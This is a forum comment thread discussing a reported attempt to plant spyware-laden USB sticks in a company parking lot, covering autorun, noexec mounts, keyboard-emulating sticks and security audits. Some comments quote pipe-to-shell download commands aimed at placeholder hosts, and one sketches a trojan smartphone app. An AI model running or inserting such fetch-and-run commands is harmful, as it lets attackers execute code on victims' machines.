Criminals Distribute Infected USB Sticks In Parking Lot

New submitter sabri writes "The Dutch news-site Elsevier is reporting that cybercriminals attempted to steal data from a multinational chemicals company by 'losing' spyware-infected USB sticks on the company's parking lot. Their attempt failed as one of the employees who found the stick dropped it off at the company's IT department, who then found the spyware and issued a warning. So next time, don't expect to find someone's dirty pictures on a USB stick you just found..."

Re:Expensive

This will usually bypass all the internet-based filtering and security systems.

Thats what virtual machines are for.

[Kenja]

So you can load USB sticks you find and extract the pictures!

Re:Thats what virtual machines are for.

No, that's what operating systems that don't automatically run any executable that happens to appear are for.

Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?

Re:Thats what virtual machines are for.

[Anaerin]

Just because it looks like a memory stick, doesn't mean it actually is one. Put a microcontroller in there with a USBHID type program and you've got a keylogger, or some other remote access system just waiting to be triggered.

Re:Thats what virtual machines are for.

[Johann+Lau]

The human body either digests or kills anything that's not marked as belonging to the body. It does allow stuff on it's surface and in the lining of the stomach I guess, but other than that, it seems to shoot first and asks questions later. Of course it can be tricked or overwhelmed, but it's not nearly as laid back as you seem to think. (Which can lead to horrible conditions where some body cells aren't recognized for some reason, and mercilessly attacked.)

The human body = mean ass motherfucker. Don't even fucking look at the guy, or he will travel back in time and drop your parents before they can meet.

Computers and operating systems, definately consumer ones = uhm... Ralph Wiggum? Yeah, that seems about right :P

Re:Thats what virtual machines are for.

We had a couple turn out in our parking lot that when plugged in showed up as a hub that was connected to a usb drive, cd drive and a keyboard. The last one was tricky. After being plugged in, it would install the devices one by one and try to run them, if that didn't work, it registered as a keyboard and tried to put the input of windows key+r then iexplore websiteURL. That last one took me by surpise, as I'd never seen it before.

Re:Thats what virtual machines are for.

[dryeo]

The quadrillion bacteria happily living in your guts would disagree, and depending on the type of their population they'll even change your behaviour.
http://www.sciencedaily.com/releases/2011/05/110517110315.htm

Re:Thats what virtual machines are for.

[JDG1980]

Good god - how idiotic does an OS have to be, to run executables from any media you happen to insert?

Not idiotic, just outdated. When Windows XP was released, way back in 2001, the assumption was that removable media was going to be a pressed CD or DVD and that these sources could be trusted. This assumption started to break down with the advent of cheap CD/DVD writers, and became completely absurd when inexpensive flash drives proliferated.

As a result, Microsoft removed Autorun from USB drives as part of a Windows XP update in 2011. (Probably a bit late, but still, they did fix it.) On Windows 7, Autorun for USB drives was never included. The user would have to run the malware manually (and if it wants admin permissions, you'd also have to click through the UAC warning).

Or just browse the thing while running Linux

[the_humeister]

Or turn off auto-run in Windows. I once found a USB drive on the ground. Turns out it was some grad student's drive. I tried to return it but got no response from the email I found on his resume.

Re:Or just browse the thing while running Linux

[ArchieBunker]

Actually auto run is no longer turned on by default in windows. XP had an update that disabled it.

Re:Expensive

[shibashaba]

These were targeted specifically though at the one company, greatly increasing the odds of getting into something that they were interested in.

just mount it in Linux

[awollabe]

and laugh at the windows auto-loader files they tried to get you with.

Seriously, I found a "trick" USB stick in my work mailbox once, which turned out to be a test from our IT department that, if you loaded it (in Windows), would direct you to an obligatory computer security training program. After I called them about it, they let me keep it.

Re:just mount it in Linux

[mlts]

USB sticks can present themselves to the computer as more than just removable hard disks. I've seen some that will act as keyboards and when plugged into Windows, will automatically try to type things in.

If the USB device can present itself as the right item, it can potentially do more damage than "just" a drive or filesystem with malware on it.

Re:just mount it in Linux

[bill_mcgonigle]

If the USB device can present itself as the right item, it can potentially do more damage than "just" a drive or filesystem with malware on it.

I forget the exact mode of attack, but some will nudge the mouse a pixel or two every minute or so to prevent the screensaver from kicking on, and then after some period of user inactivity will begin doing the nefarious bits. I suppose it's easy to kick off a cmd shell from that point and script the attack.

I'd imagine the non-mouse/keyboard part of the "drive" is baited with good porn or addictive games to encourage its continued presence. Anyway, you can scan it all you want, the drive is clean.

Cool, free thumb drive!

[toygeek]

dd if=/dev/zero of=/dev/[usbdrive]

voila, free thumb drive, malware free.

Re:Cool, free thumb drive!

[hawguy]

dd if=/dev/zero of=/dev/[usbdrive]

voila, free thumb drive, malware free.

Not if the drive has firmware that detects if it's plugged into a Windows host. For non-windows, it acts as a normal flash drive, but if you plug it into Windows, then it exposes the virus. So you take it home, load it up with MP3's from your linux computer and everything is fine, but then when you give it to your wife and she see a filenamed "naked_secretary.exe", she runs it and gets infected.

Re:Cool, free thumb drive!

[mark-t]

After executing 'dd', you still need to run mkfs on the device that holds the filesystem, or else all you have is a blanked drive. Don't forget to use "-t vfat" as an option to mkfs, or else you won't be able to use it anywhere but in Linux.

Re:Cool, free thumb drive!

[k(wi)r(kipedia)]

Not if the drive has firmware that detects if it's plugged into a Windows host.

Interesting. But can Linux detect the presence of the firmware, which presumably has to send some sort of message down the USB bus? My closest experience to this is with a combo USB 3G modem and flash drive.

To handle such devices under Linux, there's a program called USB modeswitch. From the package description:

Mode switching tool for controlling "flip flop" USB devices

Several new USB devices have their proprietary Windows drivers onboard, especially WAN dongles. When plugged in for the first time, they act like a flash storage and start installing the driver from there. If the driver is already installed, the storage device vanishes and a new device, such as an USB modem, shows up. This is called the "ZeroCD" feature.

On Debian, this is not needed, since the driver is included as a Linux kernel module, such as "usbserial". However, the device still shows up as "usb-storage" by default. usb-modeswitch solves that issue by sending the command which actually performs the switching of the device from "usb-storage" to "usbserial".

Re:Cool, free thumb drive!

[fermion]

As long as your computer does not autoexecute the USB drive, there is no problem. Of course, on many machines the USB does execute automatically, and it seems if the IT department lets that behavior stand, the responsibility cannot be with the user, but with the IT people.

Re:Expensive

[leftbrainstrain]

I haven't heard of this technique actually being used in the wild, but it's enough of a threat to be included in the standard security training everyone has to take for at least a few Fortune 500 companies -- it's why some companies (and the U.S. military, I think) may disable USB ports. Trying to get at potential targets through standard attack vectors may not be effective, so if you have a financial backer this may present a promising attack vector that greedy targets may enable. The book "Security Engineering" cites this web site (had to find via archive.org) where a consulting company found out people inserted the USB sticks under slightly different circumstances: http://web.archive.org/web/20090621014856/http://www.vnunet.com/computing/news/2173365/uk-firms-naive-usb-stick

Re:why would you run something from it?

[hawguy]

what if it had been raining?

The flash drives would have been wet, yet fully functional after they dried?

I've washed more than one flash drive and they still worked - I'm using one now that was washed over a year ago. I ran one through the driver once, and after I broke off the melted and mishapen plastic, I plugged it in and it worked.

This is discussed in...

[Darth_brooks]

This technique is discussed in "Metasploit - The penetration testers guide" ( http://shop.oreilly.com/product/9781593272883.do )

Excellent book by the way. After reading it, you'll never look at computer security the same way again, and may very well just switch to an Abacus with a box of crayons on top.

Re:why would you run something from it?

[petermgreen]

There are a few factors

1: the dominant operating system has blurred the line between running executables and opening data files. Then they went even furher and introduced autorun to make users live's easier. They have tried to put theese genies back in the bottle but it's difficult to do without introducing a load of pain for users.
2: Even if the OS doesn't have the above problem a USB stick could be put together that enumerated as a keyboard as well as a mass storage device, it could then do pretty much anything the user can do (though it has to do it blind).
2: the natural assumption when finding a USB stick in the company parking lot is that a co-worker dropped it. Therefore the natural thing to do is to try and determine who owns it so it can be returned to it's rightful owner. Deternining who owns it generally requires looking at the contents

Re:Expensive

[wierd_w]

Personally, I'd target smartphones.

If I were a malicious programmer out to get corporate dirt, I would release a "perfectly harmless" appstore game or business applet. This applet does not in any way harm the phone, or call home. What I does instead is drop some binaries on the root of the internal sdcard or flash memory storage device to mimic this attack.

This has several advantages:

1) you can update your penetration package as part of an app update, which the user won't catch.

2) you can target a device frequently demanded to be added to device exception lists, such as corporate CEOs insisting their iBone be able to sync their corporate email.

This gives you a mostly unprotected path to the mailserver if the package delivery mechanism is done right.

In the case of android phones at least, you can control how the device talks to the computer, and what HID classes it wants. This could let the phone operate as a hardware keylogger, etc.

Seriously, smartphones are a torpedo.

Re:why would you run something from it?

[Eyeball97]

I ran one through the driver once

 
I say old chap, that's a bit rough, what? I hope you paid his medical expenses and gave him a shilling bonus after that experiment. Toodle pip...

Old trick.

[Caerdwyn]

This is a time-honored way of targeting a particular company. It sounds expensive, but if your motivation is commercial or governmental *coughcoughstux* it's extremely cheap compared to the alternatives (bribery, breaking-and-entering, rubber-hose cryptography). It's also a great way of finding out whether your own organization is aware of malware trouble; this technique is commonly used as part of security audits performed by companies hired to find out how good your company really is.

A company I worked for a few years ago hired a security auditing firm to check up on ourselves (only a few people were told, and we were told to keep quiet to ensure that our day-to-day practices were tested, not our "crap, someone's checking!" performance). They were unable to penetrate the network from the outside (including wirelessly) or socially engineer their way past reception or weasel out a password, but they got in via the USB-stick-in-the-parking-lot method. They told us afterwards that this is an extremely effective technique, as primate curiosity is almost unstoppable.

Re:Expensive

[GumphMaster]

In certain military environments I worked in the USB, Firewire, and microphone ports were immediately filled with epoxy and (where possible) disconnected from the motherboard.

Personal Story

[schklerg]

So a coworker found a usb key in the parking lot and wisely didn't plug it in. Instead he asked me to check it out before he did. So dutifully I fired up my live CD, plugged it in and quickly saw it belonged to a coworker. But which one in a company of 300+? Well, that was actually pretty easy to figure out, since there was a nice folder with pictures of himself naked in a mirror. Many of them. All alone. So I gave the guy the USB key, told him what I'd seen, washed my hands (and disinfected my cubicle) and was sooooo glad when the photographer took a different job.
So there may be a virus, or maybe just a lonely coworker.

Re:Personal Story

[phantomfive]

Many of them. All alone.

You looked at them all to 'make sure,' huh?

Contest

[chrismcb]

Wouldn't it be more productive to give them away? As in brand them with the name of a product, and literally give them away at a place where they employees visit. I think someone would be much more likely to use a USB given to them at a "legitimate" event, than one found on the ground.

Re:Expensive

Yes, but with Linux you could mount the filesystem noexec and the malware writer would have to figure out how to get it to execute in order to undo the restriction. Which is a substantially harder thing than figuring out how to get it to autorun. Any idiot that's running strange programs from found USB drives deserves whatever malware he gets.

Linux virus

[DrYak]

If you think Linux has a magical immunity you might want to read how to write a Linux virus in 5 easy steps which shows with just a little social engineering its really not hard to target Linux just as the malware writers target Windows and OSX now.

From the article you mention:

A step that could be taken by the Gnome and KDE developers: Require launchers to have execute permissions. A saved attachment won't have those. Therefore, even though a syntactically correct and properly named launcher was dropped on the desktop a user can't just click on it and start it if the execute bit is not set.

Done. Modern versions of KDE need launcher to have execute permission. That hole is patched.

And nobody pretends that Linux has some magically imunity to viruses. As a Unix-like OS it just follows a few key principles :
- don't blindly execute everything. require executable to be explicitely marked as such (thus any shit downloaded from the web or from e-mail won't automatically be launchable).
- don't run constantly as root. thus the amount of harm that a program can do is limited to the access rights of a user. (While this still makes it possible to send spam, mine the data of the user, and modify the user profile, at least it prevents further deeper compromising of the running system).
That doesn't magically solve all malware problems in the universe. But at least it makes the life of malware writer a little bit more complicated. And the 5-step virus relies on a work-around of the first rule. Which has been since then corrected.

Back then, this no-brainer principles were NOT followed by Windows XP, making it even easier to write worms spreading over e-mail. Thankfully, since then Vista has arrived and has brought UAC dialogs in these situations (now how much dialogs can help security problems when the users are used to "okay" click on everything, that remains to be seen).

Or did you think android runs on Windows?

Android is a completely different beast and instead of unix-like userland it uses it's very own userland (a Java-like system).
Though it too doesn't allow execution of arbitrary e-mail attachment too. It's not impossible to write android malware, even malware that finds a way to look legitimate to android's capability system.

But at least the scenario "Here are some pics of hot lesbian teens! Click on the attachment to view them!" doesn't work on modern OSes. Except windows (and that's until WinXP, starting from Vista, you get an UAC dialog telling you that you run an executable from an untrusted source - now how many idiots will click on "okay" anyway is a different story).

Re:Linux virus

[ais523]

Same with Gnome, btw; a launcher without execute permission will get opened in a text editor if you double-click on it.

Re:Linux virus

[Compaqt]

>mount -o noexec /dev/usb /media/usb_stick

How many people are going to do that?

Most any distribution will automount anything you plug in. You never get the chance to run your mount command.

You're talking about what you would do. Everybody else is talking about what the average person would do.

By the way, what are you running--a server distro?

Even if we limit ourselves to a Linux shop (say one of the ones which have been covered by Slashdot, Munich city government or whatever), the average user does not have USB autodetection turned off. How else do their USB keyboards work?

Re:Linux virus

[drawfour]

Looks like I'm safe!

C:\Users\drawfour>wget houghi.org/trojan && sh trojan
'wget' is not recognized as an internal or external command,
operable program or batch file.

Re:Linux virus

[ozmanjusri]

How many people are going to do that?

Everybody *

Desktop distributions use pmount for USB hotplugging. From the man page:

OPTIONS
...

  -e, --exec
                            Mount the device with the exec option. Default is noexec.

http://www.linuxcertif.com/man/1/pmount/

By the way, what are you running--a server distro?

Most server distros don't automount (no desktop). You can get them to automount USB drives to a specified location (ie, for a media server) but need to install and enable the automount package and configure it, much like colinrichardday's suggestion.

* Rounded up for clarity.

He Didn't Have his Home Address on His Resume?

[Greyfox]

Didn't occur to you to go to his house, pick the locks, and leave the drive on his night stand? Because that would have been AWESOME!

It might not be a drive

[Chuck+Chunder]

The trouble with USB is that you don't know. Let's say you plug in that "thumb drive". Perhaps it turns out to be a "keyboard" that issues whatever the shortcut is for executing a command and sends something like:

wget -q -O - http://naughty.com/ | sh

All sorts of things could happen when you plug in a USB stick. Perhaps not too much of a worry in practice for Joe Schmo as doing it effectively would probably require a level of sophistication that would make it not worth while for a vague target but Linux does not magically make USB sticks safe.

Speculation vs Investigation

The 'cyber criminals planted the usb sticks in an attempt to steal data'... stuff doesn't come from investigation, it comes from speculation. It could simply have been an infected USB stick an employee threw away or dropped.

DSM is really a boring chemicals business, employing tens of thousands of people. The chances of spyware getting past anti virus software and onto the right persons computer is pretty damn slim.

So it looks more like projection to me. There's a lot of talk about cybercriminals as part of the 'cyberwar' budget requests. This was a lost USB key infected. IT dept projects the cyberwar onto their company and assumes it was a cyberattack and not some piece of crapware. Cyberwar lobby grabs the story and pumps it up for their own agenda.

Re:Speculation vs Investigation

[dutchwhizzman]

No, it's investigation. It's not just one stick, it were multiple sticks with the exact same contents on the parking lot at the same time. Yes, that sounds as clumsy as it is.

Re:Expensive

[InspectorGadget1964]

A properly coded operating system would not execute an unknown application without firs asking the user. Furthermore, a correctly build operating system would not allowed applications executed by an unprivileged user to gain control of the operating system. As you see your comments lack validity. As far as the website you mentioned, that advice will only work with systems that have been badly configured with the intention of allowing an intruder to penetrate them. I suggest you get familiar with real operating systems and stop playing with what in the computer world qualifies as “toddler operating systems” that lack strength and maturity to operate in an unprotected environment.

Re:Expensive

dud example

There are no examples, and the "5 easy steps" from the linked page haven't worked for years.

One of the reasons Linux is more secure is that the community responds far more quickly to potential threats.

Hairyfeet always gets to +5 with votes from the Apple/Windows crowd here, but he's never been able to show a single current instance of actual Linux malware in the wild. Much like the 235 patents, it's always threats from the future or the past.

Re:Expensive

[Tom]

I know that taking away the mouse and keyboard dramatically reduces the number of user mistakes, but I do wonder if this isn't taking it a little too far.

Re:why would you run something from it?

[Hognoxious]

Since ./ is a liberal cesspool

The contents of your current working directory are of no interest to me.

Re:Expensive

[hlavac]

Of course on a properly managed system, also on Windows, such a USB stick will do nothing.

Because all the USB ports are filled with glue.

Re:Expensive

[TheRaven64]

noexec only disables things that the kernel runs directly. It doesn't disable scripts if you invoke them via the correct command interpreter and it certainly doesn't protect you against, for example, a libpng or libjpeg exploit and a malicious image.